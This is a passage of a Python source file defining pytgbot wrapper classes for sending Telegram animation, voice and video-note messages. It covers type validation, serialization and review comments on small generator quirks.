    :param caption: Animation caption (may also be used when resending animation by file_id), 0-1024 characters after entities parsing
    :type  caption: str|unicode

    :param parse_mode: Mode for parsing entities in the animation caption. See formatting options for more details.
    :type  parse_mode: str|unicode

    :param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
    :type  caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, animation, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, width=None, height=None, thumb=None, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Use this method to send animation files (GIF or H.264/MPEG-4 AVC video without sound). On success, the sent Message is returned. Bots can currently send animation files of up to 50 MB in size, this limit may be changed in the future.

        https://core.telegram.org/bots/api#sendanimation

        Parameters and types are identical to the class docstring above; all keyword
        parameters default to `None` (i.e. "not set"), except `reply_id` which
        defaults to the `DEFAULT_MESSAGE_ID` sentinel.
        """
        super(AnimationMessage, self).__init__()
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(animation, InputFile, unicode_type, parameter_name="animation")
        self.animation = animation
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(duration, None, int, parameter_name="duration")
        self.duration = duration
        assert_type_or_raise(width, None, int, parameter_name="width")
        self.width = width
        assert_type_or_raise(height, None, int, parameter_name="height")
        self.height = height
        assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
        self.thumb = thumb
        assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
        self.caption = caption
        assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
        self.parse_mode = parse_mode
        # NOTE(review): only the outer container is validated here; the elements are
        # presumably MessageEntity instances — confirmed nowhere in this class.
        assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
        self.caption_entities = caption_entities
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        # NOTE(review): `ignore_reply` is accepted for interface compatibility but not
        # applied here — `reply_to_message_id` is always forwarded. Confirm against
        # how ReturnableMessageBase drives this method.
        return sender.send_animation(
            animation=self.animation,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            duration=self.duration,
            width=self.width,
            height=self.height,
            thumb=self.thumb,
            caption=self.caption,
            parse_mode=self.parse_mode,
            caption_entities=self.caption_entities,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this AnimationMessage to a dictionary.

        Optional fields that are still `None` (never set) are omitted from the
        result instead of raising `TypeError` / serializing bogus values, which
        the previous generated code did (`int(None)`, `u(None)` and the
        `isinstance` chains all blew up or mis-serialized on defaults).

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(AnimationMessage, self).to_array()
        # required field:
        if isinstance(self.animation, InputFile):
            array['animation'] = self.animation.to_array()  # type InputFile
        elif isinstance(self.animation, str):
            array['animation'] = u(self.animation)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        # optional fields, skipped while unset:
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int.')
            # end if
        # end if
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
            # end if
        # end if
        if self.duration is not None:
            array['duration'] = int(self.duration)  # type int
        # end if
        if self.width is not None:
            array['width'] = int(self.width)  # type int
        # end if
        if self.height is not None:
            array['height'] = int(self.height)  # type int
        # end if
        if self.thumb is not None:
            if isinstance(self.thumb, InputFile):
                array['thumb'] = self.thumb.to_array()  # type InputFile
            elif isinstance(self.thumb, str):
                array['thumb'] = u(self.thumb)  # py2: type unicode, py3: type str
            else:
                raise TypeError('Unknown type, must be one of InputFile, str.')
            # end if
        # end if
        if self.caption is not None:
            array['caption'] = u(self.caption)  # py2: type unicode, py3: type str
        # end if
        if self.parse_mode is not None:
            array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
        # end if
        if self.caption_entities is not None:
            array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities)  # type list of MessageEntity
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is not None:
            if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
                array['reply_markup'] = self.reply_markup.to_array()
            else:
                raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
            # end if
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the AnimationMessage constructor.

        :param array: dictionary as produced by `to_array()`.
        :type  array: dict

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(AnimationMessage, AnimationMessage).validate_array(array)
        # NOTE(review): generator quirk kept as-is — an already-deserialized InputFile
        # is passed through `InputFile.from_array()` again; confirm that is a no-op.
        if isinstance(array.get('animation'), InputFile):
            data['animation'] = InputFile.from_array(array.get('animation'))
        elif isinstance(array.get('animation'), str):
            data['animation'] = u(array.get('animation'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): assigns the DEFAULT_MESSAGE_ID sentinel itself, not the
            # stored value — kept from the generated code, presumably intentional.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
        data['width'] = int(array.get('width')) if array.get('width') is not None else None
        data['height'] = int(array.get('height')) if array.get('height') is not None else None
        if array.get('thumb') is None:
            data['thumb'] = None
        elif isinstance(array.get('thumb'), InputFile):
            data['thumb'] = InputFile.from_array(array.get('thumb'))
        elif isinstance(array.get('thumb'), str):
            data['thumb'] = u(array.get('thumb'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str or None.')
        # end if
        data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
        data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
        data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new AnimationMessage from a given dictionary.

        :return: new AnimationMessage instance, or `None` for empty input.
        :rtype: AnimationMessage | None
        """
        if not array:  # None or {}
            return None
        # end if
        return AnimationMessage(**AnimationMessage.validate_array(array))
    # end def from_array

    def __str__(self):
        """
        Implements `str(animationmessage_instance)`.

        Delegates to `__repr__` so there is only one format string to maintain.
        """
        return self.__repr__()
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(animationmessage_instance)`.
        """
        return "AnimationMessage(animation={self.animation!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in animationmessage_instance`.

        True only when `key` names a known field AND that field holds a truthy value.
        """
        return (
            key in ("animation", "receiver", "reply_id", "duration", "width", "height", "thumb", "caption", "parse_mode", "caption_entities", "disable_notification", "allow_sending_without_reply", "reply_markup")
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class AnimationMessage
class VoiceMessage(ReturnableMessageBase):
    """
    Use this method to send audio files, if you want Telegram clients to display the file as a playable voice message. For this to work, your audio must be in an .OGG file encoded with OPUS (other formats may be sent as Audio or Document). On success, the sent Message is returned. Bots can currently send voice messages of up to 50 MB in size, this limit may be changed in the future.

    https://core.telegram.org/bots/api#sendvoice

    Parameters:

    :param voice: Audio file to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
    :type  voice: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param caption: Voice message caption, 0-1024 characters after entities parsing
    :type  caption: str|unicode

    :param parse_mode: Mode for parsing entities in the voice message caption. See formatting options for more details.
    :type  parse_mode: str|unicode

    :param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
    :type  caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity

    :param duration: Duration of the voice message in seconds
    :type  duration: int

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, voice, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, duration=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Use this method to send audio files, if you want Telegram clients to display the file as a playable voice message. For this to work, your audio must be in an .OGG file encoded with OPUS (other formats may be sent as Audio or Document). On success, the sent Message is returned. Bots can currently send voice messages of up to 50 MB in size, this limit may be changed in the future.

        https://core.telegram.org/bots/api#sendvoice

        Parameters and types are identical to the class docstring above; all keyword
        parameters default to `None` (i.e. "not set"), except `reply_id` which
        defaults to the `DEFAULT_MESSAGE_ID` sentinel.
        """
        super(VoiceMessage, self).__init__()
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(voice, InputFile, unicode_type, parameter_name="voice")
        self.voice = voice
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
        self.caption = caption
        assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
        self.parse_mode = parse_mode
        # NOTE(review): only the outer container is validated here; the elements are
        # presumably MessageEntity instances — confirmed nowhere in this class.
        assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
        self.caption_entities = caption_entities
        assert_type_or_raise(duration, None, int, parameter_name="duration")
        self.duration = duration
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        # NOTE(review): `ignore_reply` is accepted for interface compatibility but not
        # applied here — `reply_to_message_id` is always forwarded. Confirm against
        # how ReturnableMessageBase drives this method.
        return sender.send_voice(
            voice=self.voice,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            caption=self.caption,
            parse_mode=self.parse_mode,
            caption_entities=self.caption_entities,
            duration=self.duration,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this VoiceMessage to a dictionary.

        Optional fields that are still `None` (never set) are omitted from the
        result instead of raising `TypeError` / serializing bogus values, which
        the previous generated code did (`int(None)`, `u(None)` and the
        `isinstance` chains all blew up or mis-serialized on defaults).

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(VoiceMessage, self).to_array()
        # required field:
        if isinstance(self.voice, InputFile):
            array['voice'] = self.voice.to_array()  # type InputFile
        elif isinstance(self.voice, str):
            array['voice'] = u(self.voice)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        # optional fields, skipped while unset:
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int.')
            # end if
        # end if
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
            # end if
        # end if
        if self.caption is not None:
            array['caption'] = u(self.caption)  # py2: type unicode, py3: type str
        # end if
        if self.parse_mode is not None:
            array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
        # end if
        if self.caption_entities is not None:
            array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities)  # type list of MessageEntity
        # end if
        if self.duration is not None:
            array['duration'] = int(self.duration)  # type int
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is not None:
            if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
                array['reply_markup'] = self.reply_markup.to_array()
            else:
                raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
            # end if
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the VoiceMessage constructor.

        :param array: dictionary as produced by `to_array()`.
        :type  array: dict

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(VoiceMessage, VoiceMessage).validate_array(array)
        # NOTE(review): generator quirk kept as-is — an already-deserialized InputFile
        # is passed through `InputFile.from_array()` again; confirm that is a no-op.
        if isinstance(array.get('voice'), InputFile):
            data['voice'] = InputFile.from_array(array.get('voice'))
        elif isinstance(array.get('voice'), str):
            data['voice'] = u(array.get('voice'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): assigns the DEFAULT_MESSAGE_ID sentinel itself, not the
            # stored value — kept from the generated code, presumably intentional.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
        data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
        data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
        data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new VoiceMessage from a given dictionary.

        :return: new VoiceMessage instance, or `None` for empty input.
        :rtype: VoiceMessage | None
        """
        if not array:  # None or {}
            return None
        # end if
        return VoiceMessage(**VoiceMessage.validate_array(array))
    # end def from_array

    def __str__(self):
        """
        Implements `str(voicemessage_instance)`.

        Delegates to `__repr__` so there is only one format string to maintain.
        """
        return self.__repr__()
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(voicemessage_instance)`.
        """
        return "VoiceMessage(voice={self.voice!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, duration={self.duration!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in voicemessage_instance`.

        True only when `key` names a known field AND that field holds a truthy value.
        """
        return (
            key in ("voice", "receiver", "reply_id", "caption", "parse_mode", "caption_entities", "duration", "disable_notification", "allow_sending_without_reply", "reply_markup")
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class VoiceMessage
class VideoNoteMessage(ReturnableMessageBase):
    """
    As of v.4.0, Telegram clients support rounded square mp4 videos of up to 1 minute long. Use this method to send video messages. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendvideonote

    Parameters:

    :param video_note: Video note to send. Pass a file_id as String to send a video note that exists on the Telegram servers (recommended) or upload a new video using multipart/form-data. More info on Sending Files ». Sending video notes by a URL is currently unsupported
    :type  video_note: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param duration: Duration of sent video in seconds
    :type  duration: int

    :param length: Video width and height, i.e. diameter of the video message
    :type  length: int

    :param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
    :type  thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, video_note, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, length=None, thumb=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Create a VideoNoteMessage to be sent later via :meth:`actual_send`.

        See the class docstring for the full parameter documentation
        (mirrors https://core.telegram.org/bots/api#sendvideonote).

        :param video_note: Video note to send (InputFile or file_id string).
        :type  video_note: pytgbot.api_types.sendable.files.InputFile | str|unicode

        :param receiver: Optional chat_id override.
        :type  receiver: None | str|unicode | int

        :param reply_id: Optional reply_to_message_id override.
        :type  reply_id: DEFAULT_MESSAGE_ID | int | None

        :param duration: Duration of sent video in seconds.
        :type  duration: None | int

        :param length: Video width and height (diameter of the video message).
        :type  length: None | int

        :param thumb: Optional thumbnail of the file sent.
        :type  thumb: None | pytgbot.api_types.sendable.files.InputFile | str|unicode

        :param disable_notification: Send the message silently.
        :type  disable_notification: None | bool

        :param allow_sending_without_reply: Send even if the replied-to message is not found.
        :type  allow_sending_without_reply: None | bool

        :param reply_markup: Additional interface options (keyboard etc.).
        :type  reply_markup: None | InlineKeyboardMarkup | ReplyKeyboardMarkup | ReplyKeyboardRemove | ForceReply
        """
        super(VideoNoteMessage, self).__init__()
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(video_note, InputFile, unicode_type, parameter_name="video_note")
        self.video_note = video_note
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(duration, None, int, parameter_name="duration")
        self.duration = duration
        assert_type_or_raise(length, None, int, parameter_name="length")
        self.length = length
        assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
        self.thumb = thumb
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_video_note(
            video_note=self.video_note,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            duration=self.duration,
            length=self.length,
            thumb=self.thumb,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def send

    def to_array(self):
        """
        Serializes this VideoNoteMessage to a dictionary.

        Optional fields which are still ``None`` are simply omitted from the
        result (bugfix: previously ``int(None)`` and the exhausted
        ``isinstance`` chains raised ``TypeError`` for any unset optional
        value, even though ``__init__`` explicitly allows ``None``).

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.files import InputFile
